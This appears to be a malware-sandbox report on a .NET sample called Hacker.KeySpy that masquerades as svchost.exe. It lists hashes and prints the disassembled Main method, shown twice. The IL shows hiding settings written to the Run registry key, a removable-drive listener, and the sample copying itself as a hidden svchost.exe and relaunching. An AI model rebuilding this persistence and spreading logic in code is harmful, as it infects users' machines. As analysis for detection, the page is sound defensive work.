Suspicious
Suspect

f16b392a7cf3c359c8217504153c94f1

PE Executable
|
MD5: f16b392a7cf3c359c8217504153c94f1
|
Size: 65.55 KB
|
application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Ofbuscation Score

Low

Hash
 Hash Value
MD5
f16b392a7cf3c359c8217504153c94f1
Sha1
2486f223df371ab66edb21c5267db959fa7f33ed
Sha256
c4bec9968970bbc9086dd0f846472cb6aca12e3b1d5beff43237e956b8b52116
Sha384
a5bc76e7176181f21be4b2489942968b5edd57bd56f0d174575983068f50ec473d8b79857c2fc8fd304336f20883ace6
Sha512
c7a8e715151addca8177b92f8a13a6487d3567c3497d9d416bfd8838803898ef725e079b1d232a6d3ee0e8e18ca792aedd3f1ff7f728f29b2f0b915071d8c6da
SSDeep
768:5NjuxqnTooRN0RneUD86Mw8KL0HpFBv8s3i6E5nXfUWPYfIc/Qi3qEBQp:5Njum7Ynydw8KwHpF73i6EBXlLOUp
TLSH
B6535C09B3DD8662C47E1679445297104330FC366E0BDB872ED1B4AF2C663928B72B5F

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
f16b392a7cf3c359c8217504153c94f1
[Rebuild from dump]_92839511.exe
.Net Resources
Hacker.KeySpy.Controls.DriveListener.resources
Informations
Name
 Value
Info

PE Detect: PeReader FAIL, AsmResolver Mapped OK
Info

Remap: Mapped -> FileLayout (RAM only) as [Rebuild from dump]_92839511.exe
Module Name

svchost.exe
Full Name

svchost.exe
EntryPoint

System.Int32 Hacker.KeySpy.Program::Main(System.String[])
Scope Name

svchost.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v2.0.50727
Tables Header Version

512
WinMD Version

<null>
Assembly Name

svchost
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

<null>
Total Strings

77
Main Method

System.Int32 Hacker.KeySpy.Program::Main(System.String[])
Main IL Instruction Count

283
Main IL

nop <null> ldc.i4.0 <null> stloc.0 <null> nop <null> ldc.i4.1 <null> ldstr APName ldloca.s V_1 newobj System.Void System.Threading.Mutex::.ctor(System.Boolean,System.String,System.Boolean&) stsfld System.Threading.Mutex Hacker.KeySpy.Program::appMutex ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::CurrentUser ldstr SOFTWARE\Microsoft\Windows\CurrentVersion\Run callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::CreateSubKey(System.String) ldstr Hidden ldc.i4.0 <null> box System.Int32 ldc.i4.4 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object,Microsoft.Win32.RegistryValueKind) nop <null> ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::CurrentUser ldstr SOFTWARE\Microsoft\Windows\CurrentVersion\Run callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::CreateSubKey(System.String) ldstr HideFileExt ldc.i4.1 <null> box System.Int32 ldc.i4.4 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object,Microsoft.Win32.RegistryValueKind) nop <null> ldc.i4.2 <null> newobj System.Void Hacker.KeySpy.Controls.DriveListener::.ctor(System.IO.DriveType) stloc.2 <null> ldloc.2 <null> ldnull <null> ldftn System.Void Hacker.KeySpy.Program::flashDriveListener_DriveExists(System.Object,Hacker.KeySpy.Controls.DriveExistsEventArgs) newobj System.Void Hacker.KeySpy.Controls.DriveListener/DriveExistsEventHandler::.ctor(System.Object,System.IntPtr) callvirt System.Void Hacker.KeySpy.Controls.DriveListener::add_DriveExists(Hacker.KeySpy.Controls.DriveListener/DriveExistsEventHandler) nop <null> ldloc.2 <null> callvirt System.Void Hacker.KeySpy.Controls.DriveListener::Start() nop <null> ldsfld System.IO.DriveInfo Hacker.KeySpy.Program::progDrive callvirt System.IO.DriveType System.IO.DriveInfo::get_DriveType() ldc.i4.3 <null> ceq <null> ldc.i4.0 <null> ceq <null> stloc.s V_6 ldloc.s V_6 brtrue.s IL_00C4: nop nop <null> ldloc.1 <null> stloc.s V_6 ldloc.s V_6 brtrue.s IL_00B1: newobj System.Void Hacker.KeySpy.MainContext::.ctor() nop <null> ldsfld System.Threading.Mutex Hacker.KeySpy.Program::appMutex callvirt System.Void System.Threading.WaitHandle::Close() nop <null> ldnull <null> stsfld System.Threading.Mutex Hacker.KeySpy.Program::appMutex ldc.i4.0 <null> stloc.s V_5 leave IL_02F9: nop newobj System.Void Hacker.KeySpy.MainContext::.ctor() stloc.3 <null> ldloc.3 <null> call System.Void System.Windows.Forms.Application::Run(System.Windows.Forms.ApplicationContext) nop <null> nop <null> br IL_02C0: ldc.i4.0 nop <null> ldsfld System.IO.DirectoryInfo Hacker.KeySpy.Program::progDir callvirt System.String System.IO.FileSystemInfo::get_FullName() ldsfld System.IO.FileInfo Hacker.KeySpy.Program::progFile callvirt System.String System.IO.FileSystemInfo::get_Name() ldstr .exe ldstr callvirt System.String System.String::Replace(System.String,System.String) call System.String System.String::Concat(System.String,System.String) call System.Boolean System.IO.Directory::Exists(System.String) ldc.i4.0 <null> ceq <null> stloc.s V_6 ldloc.s V_6 brtrue.s IL_0130: ldloc.1 nop <null> ldstr explorer.exe ldsfld System.IO.DirectoryInfo Hacker.KeySpy.Program::progDir callvirt System.String System.IO.FileSystemInfo::get_FullName() ldsfld System.IO.FileInfo Hacker.KeySpy.Program::progFile callvirt System.String System.IO.FileSystemInfo::get_Name() ldstr .exe ldstr callvirt System.String System.String::Replace(System.String,System.String) call System.String System.String::Concat(System.String,System.String) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String,System.String) pop <null> nop <null> ldloc.1 <null> stloc.s V_6 ldloc.s V_6 brtrue.s IL_0151: ldnull nop <null> ldsfld System.Threading.Mutex Hacker.KeySpy.Program::appMutex callvirt System.Void System.Threading.WaitHandle::Close() nop <null> ldnull <null> stsfld System.Threading.Mutex Hacker.KeySpy.Program::appMutex ldc.i4.0 <null> stloc.s V_5 leave IL_02F9: nop ldnull <null> stloc.s V_4 nop <null> ldc.i4.s 37 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr /Important/svchost.exe call System.String System.String::Concat(System.String,System.String) newobj System.Void System.IO.FileInfo::.ctor(System.String) stloc.s V_4 ldloc.s V_4 callvirt System.Boolean System.IO.FileSystemInfo::get_Exists() ldc.i4.0 <null> ceq <null> stloc.s V_6 ldloc.s V_6 brtrue.s IL_01B6: nop nop <null> ldsfld System.IO.FileInfo Hacker.KeySpy.Program::progFile ldloc.s V_4 call System.Boolean Hacker.KeySpy.Other::FileCompare(System.IO.FileInfo,System.IO.FileInfo) stloc.s V_6 ldloc.s V_6 brtrue.s IL_01A5: ldloc.s V_4 nop <null> ldsfld System.IO.FileInfo Hacker.KeySpy.Program::progFile ldloc.s V_4 callvirt System.String System.IO.FileSystemInfo::get_FullName() ldc.i4.1 <null> callvirt System.IO.FileInfo System.IO.FileInfo::CopyTo(System.String,System.Boolean) pop <null> nop <null> ldloc.s V_4 callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() ldc.i4.2 <null> callvirt System.Void System.IO.FileSystemInfo::set_Attributes(System.IO.FileAttributes) nop <null> nop <null> br.s IL_01FE: nop nop <null> ldloc.s V_4 callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() callvirt System.String System.IO.FileSystemInfo::get_FullName() call System.Boolean System.IO.Directory::Exists(System.String) stloc.s V_6 ldloc.s V_6 brtrue.s IL_01DD: ldsfld System.IO.FileInfo Hacker.KeySpy.Program::progFile nop <null> ldloc.s V_4 callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() callvirt System.Void System.IO.DirectoryInfo::Create() nop <null> nop <null> ldsfld System.IO.FileInfo Hacker.KeySpy.Program::progFile ldloc.s V_4 callvirt System.String System.IO.FileSystemInfo::get_FullName() callvirt System.IO.FileInfo System.IO.FileInfo::CopyTo(System.String) pop <null> ldloc.s V_4 callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() ldc.i4.2 <null> callvirt System.Void System.IO.FileSystemInfo::set_Attributes(System.IO.FileAttributes) nop <null> nop <null> nop <null> leave IL_02B1: nop pop <null> nop <null> ldc.i4.5 <null> call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr /Important/svchost.exe call System.String System.String::Concat(System.String,System.String) newobj System.Void System.IO.FileInfo::.ctor(System.String) stloc.s V_4 ldloc.s V_4 callvirt System.Boolean System.IO.FileSystemInfo::get_Exists() ldc.i4.0 <null> ceq <null> stloc.s V_6 ldloc.s V_6 brtrue.s IL_0266: nop nop <null> ldsfld System.IO.FileInfo Hacker.KeySpy.Program::progFile ldloc.s V_4 call System.Boolean Hacker.KeySpy.Other::FileCompare(System.IO.FileInfo,System.IO.FileInfo) stloc.s V_6 ldloc.s V_6 brtrue.s IL_0255: ldloc.s V_4 nop <null> ldsfld System.IO.FileInfo Hacker.KeySpy.Program::progFile ldloc.s V_4 callvirt System.String System.IO.FileSystemInfo::get_FullName() ldc.i4.1 <null> callvirt System.IO.FileInfo System.IO.FileInfo::CopyTo(System.String,System.Boolean) pop <null> nop <null> ldloc.s V_4 callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() ldc.i4.2 <null> callvirt System.Void System.IO.FileSystemInfo::set_Attributes(System.IO.FileAttributes) nop <null> nop <null> br.s IL_02AE: nop nop <null> ldloc.s V_4 callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() callvirt System.String System.IO.FileSystemInfo::get_FullName() call System.Boolean System.IO.Directory::Exists(System.String) stloc.s V_6 ldloc.s V_6 brtrue.s IL_028D: ldsfld System.IO.FileInfo Hacker.KeySpy.Program::progFile nop <null> ldloc.s V_4 callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() callvirt System.Void System.IO.DirectoryInfo::Create() nop <null> nop <null> ldsfld System.IO.FileInfo Hacker.KeySpy.Program::progFile ldloc.s V_4 callvirt System.String System.IO.FileSystemInfo::get_FullName() callvirt System.IO.FileInfo System.IO.FileInfo::CopyTo(System.String) pop <null> ldloc.s V_4 callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() ldc.i4.2 <null> callvirt System.Void System.IO.FileSystemInfo::set_Attributes(System.IO.FileAttributes) nop <null> nop <null> nop <null> leave.s IL_02B1: nop nop <null> ldloc.s V_4 callvirt System.String System.IO.FileSystemInfo::get_FullName() call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String) pop <null> nop <null> ldc.i4.0 <null> stloc.0 <null> nop <null> leave.s IL_02CC: nop pop <null> nop <null> ldc.i4.m1 <null> stloc.0 <null> nop <null> leave.s IL_02CC: nop nop <null> leave.s IL_02F3: nop nop <null> ldloc.0 <null> call System.Boolean System.Convert::ToBoolean(System.Int32) ldc.i4.0 <null> ceq <null> stloc.s V_6 ldloc.s V_6 brtrue.s IL_02E9: nop nop <null> call System.Void System.Windows.Forms.Application::Restart() nop <null> nop <null> br.s IL_02F1: nop nop <null> call System.Void System.Windows.Forms.Application::Exit() nop <null> nop <null> nop <null> endfinally <null> nop <null> ldloc.0 <null> stloc.s V_5 br.s IL_02F9: nop nop <null> ldloc.s V_5 ret <null>
Module Name

svchost.exe
Full Name

svchost.exe
EntryPoint

System.Int32 Hacker.KeySpy.Program::Main(System.String[])
Scope Name

svchost.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v2.0.50727
Tables Header Version

512
WinMD Version

<null>
Assembly Name

svchost
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

<null>
Total Strings

77
Main Method

System.Int32 Hacker.KeySpy.Program::Main(System.String[])
Main IL Instruction Count

283
Main IL

nop <null> ldc.i4.0 <null> stloc.0 <null> nop <null> ldc.i4.1 <null> ldstr APName ldloca.s V_1 newobj System.Void System.Threading.Mutex::.ctor(System.Boolean,System.String,System.Boolean&) stsfld System.Threading.Mutex Hacker.KeySpy.Program::appMutex ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::CurrentUser ldstr SOFTWARE\Microsoft\Windows\CurrentVersion\Run callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::CreateSubKey(System.String) ldstr Hidden ldc.i4.0 <null> box System.Int32 ldc.i4.4 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object,Microsoft.Win32.RegistryValueKind) nop <null> ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::CurrentUser ldstr SOFTWARE\Microsoft\Windows\CurrentVersion\Run callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::CreateSubKey(System.String) ldstr HideFileExt ldc.i4.1 <null> box System.Int32 ldc.i4.4 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object,Microsoft.Win32.RegistryValueKind) nop <null> ldc.i4.2 <null> newobj System.Void Hacker.KeySpy.Controls.DriveListener::.ctor(System.IO.DriveType) stloc.2 <null> ldloc.2 <null> ldnull <null> ldftn System.Void Hacker.KeySpy.Program::flashDriveListener_DriveExists(System.Object,Hacker.KeySpy.Controls.DriveExistsEventArgs) newobj System.Void Hacker.KeySpy.Controls.DriveListener/DriveExistsEventHandler::.ctor(System.Object,System.IntPtr) callvirt System.Void Hacker.KeySpy.Controls.DriveListener::add_DriveExists(Hacker.KeySpy.Controls.DriveListener/DriveExistsEventHandler) nop <null> ldloc.2 <null> callvirt System.Void Hacker.KeySpy.Controls.DriveListener::Start() nop <null> ldsfld System.IO.DriveInfo Hacker.KeySpy.Program::progDrive callvirt System.IO.DriveType System.IO.DriveInfo::get_DriveType() ldc.i4.3 <null> ceq <null> ldc.i4.0 <null> ceq <null> stloc.s V_6 ldloc.s V_6 brtrue.s IL_00C4: nop nop <null> ldloc.1 <null> stloc.s V_6 ldloc.s V_6 brtrue.s IL_00B1: newobj System.Void Hacker.KeySpy.MainContext::.ctor() nop <null> ldsfld System.Threading.Mutex Hacker.KeySpy.Program::appMutex callvirt System.Void System.Threading.WaitHandle::Close() nop <null> ldnull <null> stsfld System.Threading.Mutex Hacker.KeySpy.Program::appMutex ldc.i4.0 <null> stloc.s V_5 leave IL_02F9: nop newobj System.Void Hacker.KeySpy.MainContext::.ctor() stloc.3 <null> ldloc.3 <null> call System.Void System.Windows.Forms.Application::Run(System.Windows.Forms.ApplicationContext) nop <null> nop <null> br IL_02C0: ldc.i4.0 nop <null> ldsfld System.IO.DirectoryInfo Hacker.KeySpy.Program::progDir callvirt System.String System.IO.FileSystemInfo::get_FullName() ldsfld System.IO.FileInfo Hacker.KeySpy.Program::progFile callvirt System.String System.IO.FileSystemInfo::get_Name() ldstr .exe ldstr callvirt System.String System.String::Replace(System.String,System.String) call System.String System.String::Concat(System.String,System.String) call System.Boolean System.IO.Directory::Exists(System.String) ldc.i4.0 <null> ceq <null> stloc.s V_6 ldloc.s V_6 brtrue.s IL_0130: ldloc.1 nop <null> ldstr explorer.exe ldsfld System.IO.DirectoryInfo Hacker.KeySpy.Program::progDir callvirt System.String System.IO.FileSystemInfo::get_FullName() ldsfld System.IO.FileInfo Hacker.KeySpy.Program::progFile callvirt System.String System.IO.FileSystemInfo::get_Name() ldstr .exe ldstr callvirt System.String System.String::Replace(System.String,System.String) call System.String System.String::Concat(System.String,System.String) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String,System.String) pop <null> nop <null> ldloc.1 <null> stloc.s V_6 ldloc.s V_6 brtrue.s IL_0151: ldnull nop <null> ldsfld System.Threading.Mutex Hacker.KeySpy.Program::appMutex callvirt System.Void System.Threading.WaitHandle::Close() nop <null> ldnull <null> stsfld System.Threading.Mutex Hacker.KeySpy.Program::appMutex ldc.i4.0 <null> stloc.s V_5 leave IL_02F9: nop ldnull <null> stloc.s V_4 nop <null> ldc.i4.s 37 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr /Important/svchost.exe call System.String System.String::Concat(System.String,System.String) newobj System.Void System.IO.FileInfo::.ctor(System.String) stloc.s V_4 ldloc.s V_4 callvirt System.Boolean System.IO.FileSystemInfo::get_Exists() ldc.i4.0 <null> ceq <null> stloc.s V_6 ldloc.s V_6 brtrue.s IL_01B6: nop nop <null> ldsfld System.IO.FileInfo Hacker.KeySpy.Program::progFile ldloc.s V_4 call System.Boolean Hacker.KeySpy.Other::FileCompare(System.IO.FileInfo,System.IO.FileInfo) stloc.s V_6 ldloc.s V_6 brtrue.s IL_01A5: ldloc.s V_4 nop <null> ldsfld System.IO.FileInfo Hacker.KeySpy.Program::progFile ldloc.s V_4 callvirt System.String System.IO.FileSystemInfo::get_FullName() ldc.i4.1 <null> callvirt System.IO.FileInfo System.IO.FileInfo::CopyTo(System.String,System.Boolean) pop <null> nop <null> ldloc.s V_4 callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() ldc.i4.2 <null> callvirt System.Void System.IO.FileSystemInfo::set_Attributes(System.IO.FileAttributes) nop <null> nop <null> br.s IL_01FE: nop nop <null> ldloc.s V_4 callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() callvirt System.String System.IO.FileSystemInfo::get_FullName() call System.Boolean System.IO.Directory::Exists(System.String) stloc.s V_6 ldloc.s V_6 brtrue.s IL_01DD: ldsfld System.IO.FileInfo Hacker.KeySpy.Program::progFile nop <null> ldloc.s V_4 callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() callvirt System.Void System.IO.DirectoryInfo::Create() nop <null> nop <null> ldsfld System.IO.FileInfo Hacker.KeySpy.Program::progFile ldloc.s V_4 callvirt System.String System.IO.FileSystemInfo::get_FullName() callvirt System.IO.FileInfo System.IO.FileInfo::CopyTo(System.String) pop <null> ldloc.s V_4 callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() ldc.i4.2 <null> callvirt System.Void System.IO.FileSystemInfo::set_Attributes(System.IO.FileAttributes) nop <null> nop <null> nop <null> leave IL_02B1: nop pop <null> nop <null> ldc.i4.5 <null> call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr /Important/svchost.exe call System.String System.String::Concat(System.String,System.String) newobj System.Void System.IO.FileInfo::.ctor(System.String) stloc.s V_4 ldloc.s V_4 callvirt System.Boolean System.IO.FileSystemInfo::get_Exists() ldc.i4.0 <null> ceq <null> stloc.s V_6 ldloc.s V_6 brtrue.s IL_0266: nop nop <null> ldsfld System.IO.FileInfo Hacker.KeySpy.Program::progFile ldloc.s V_4 call System.Boolean Hacker.KeySpy.Other::FileCompare(System.IO.FileInfo,System.IO.FileInfo) stloc.s V_6 ldloc.s V_6 brtrue.s IL_0255: ldloc.s V_4 nop <null> ldsfld System.IO.FileInfo Hacker.KeySpy.Program::progFile ldloc.s V_4 callvirt System.String System.IO.FileSystemInfo::get_FullName() ldc.i4.1 <null> callvirt System.IO.FileInfo System.IO.FileInfo::CopyTo(System.String,System.Boolean) pop <null> nop <null> ldloc.s V_4 callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() ldc.i4.2 <null> callvirt System.Void System.IO.FileSystemInfo::set_Attributes(System.IO.FileAttributes) nop <null> nop <null> br.s IL_02AE: nop nop <null> ldloc.s V_4 callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() callvirt System.String System.IO.FileSystemInfo::get_FullName() call System.Boolean System.IO.Directory::Exists(System.String) stloc.s V_6 ldloc.s V_6 brtrue.s IL_028D: ldsfld System.IO.FileInfo Hacker.KeySpy.Program::progFile nop <null> ldloc.s V_4 callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() callvirt System.Void System.IO.DirectoryInfo::Create() nop <null> nop <null> ldsfld System.IO.FileInfo Hacker.KeySpy.Program::progFile ldloc.s V_4 callvirt System.String System.IO.FileSystemInfo::get_FullName() callvirt System.IO.FileInfo System.IO.FileInfo::CopyTo(System.String) pop <null> ldloc.s V_4 callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() ldc.i4.2 <null> callvirt System.Void System.IO.FileSystemInfo::set_Attributes(System.IO.FileAttributes) nop <null> nop <null> nop <null> leave.s IL_02B1: nop nop <null> ldloc.s V_4 callvirt System.String System.IO.FileSystemInfo::get_FullName() call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String) pop <null> nop <null> ldc.i4.0 <null> stloc.0 <null> nop <null> leave.s IL_02CC: nop pop <null> nop <null> ldc.i4.m1 <null> stloc.0 <null> nop <null> leave.s IL_02CC: nop nop <null> leave.s IL_02F3: nop nop <null> ldloc.0 <null> call System.Boolean System.Convert::ToBoolean(System.Int32) ldc.i4.0 <null> ceq <null> stloc.s V_6 ldloc.s V_6 brtrue.s IL_02E9: nop nop <null> call System.Void System.Windows.Forms.Application::Restart() nop <null> nop <null> br.s IL_02F1: nop nop <null> call System.Void System.Windows.Forms.Application::Exit() nop <null> nop <null> nop <null> endfinally <null> nop <null> ldloc.0 <null> stloc.s V_5 br.s IL_02F9: nop nop <null> ldloc.s V_5 ret <null>
Artefacts
Name
 Value
PE Layout

MemoryMapped (process dump suspected)
PE Layout

MemoryMapped (process dump suspected)
f16b392a7cf3c359c8217504153c94f1 (65.55 KB)
File Structure
f16b392a7cf3c359c8217504153c94f1
[Rebuild from dump]_92839511.exe
.Net Resources
Hacker.KeySpy.Controls.DriveListener.resources
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
PE Layout

MemoryMapped (process dump suspected)

f16b392a7cf3c359c8217504153c94f1
PE Layout

MemoryMapped (process dump suspected)

f16b392a7cf3c359c8217504153c94f1 > [Rebuild from dump]_92839511.exe
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙